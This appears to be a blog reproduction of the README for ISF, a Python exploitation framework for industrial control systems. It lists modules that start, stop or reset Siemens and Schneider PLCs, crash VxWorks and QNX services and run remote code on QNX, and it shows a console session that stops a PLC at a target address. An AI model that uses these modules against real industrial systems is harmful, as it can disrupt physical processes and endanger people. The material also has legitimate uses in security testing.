ISF(Industrial Control System Exploitation Framework),a exploitation framework based on Python. Industrial Control System is based on open source project routersploit.

ICS Protocol Clients

NamePathDescription
modbus_tcp_clienticssploit/clients/modbus_tcp_client.pyModbus-TCP Client
wdb2_clienticssploit/clients/wdb2_client.pyWdbRPC Version 2 Client(Vxworks 6.x)
s7_clienticssploit/clients/s7_client.pys7comm Client(S7 300/400 PLC)

Also Read – Darksplitz : Exploit Framework

Exploit Module

NamePathDescription
s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_control.pyS7-300/400 PLC start/stop
s7_1200_plc_controlexploits/plcs/siemens/s7_1200_plc_control.pyS7-1200 PLC start/stop/reset
vxworks_rpc_dosexploits/plcs/vxworks/vxworks_rpc_dos.pyVxworks RPC remote dos(CVE-2015-7599)
quantum_140_plc_controlexploits/plcs/schneider/quantum_140_plc_control.pySchneider Quantum 140 series PLC start/stop
crash_qnx_inetd_tcp_serviceexploits/plcs/qnx/crash_qnx_inetd_tcp_service.pyQNX Inetd TCP service dos
qconn_remote_execexploits/plcs/qnx/qconn_remote_exec.pyQNX qconn remote code execution
profinet_set_ipexploits/plcs/siemens/profinet_set_ip.pyProfinet DCP device IP config

Scanner Module

NamePathDescription
profinet_dcp_scanscanners/profinet_dcp_scan.pyProfinet DCP scanner
vxworks_6_scanscanners/vxworks_6_scan.pyVxworks 6.x scanner
s7comm_scanscanners/s7comm_scan.pyS7comm scanner
enip_scanscanners/enip_scan.pyEthernetIP scanner

ICS Protocols Module (Scapy Module)

These protocol can used in other Fuzzing framework like Kitty or create your own client.

NamePathDescription
pn_dcpicssploit/protocols/pn_dcpProfinet DCP Protocol
modbus_tcpicssploit/protocols/modbus_tcpModbus TCP Protocol
wdbrpc2icssploit/protocols/wdbrpc2WDB RPC Version 2 Protocol
s7commicssploit/protocols/s7comm.pyS7comm Protocol

Install

Python requirements

Install on Kali

git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Usage

root@kali:~/Desktop/temp/isf# python isf.py
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0

Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >

Exploits

isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

You can use the tab key for completion.

Options

Display module options:

isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
—- —————- ———–
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
—- —————- ———–
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >

Set options

isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {‘target’: ‘192.168.70.210’}

Run module

isf (S7-300/400 PLC Control) > run
[] Running module… [+] Target is alive [] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Display information about exploit

isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
wenzhe zhu

References:
isf (S7-300/400 PLC Control) >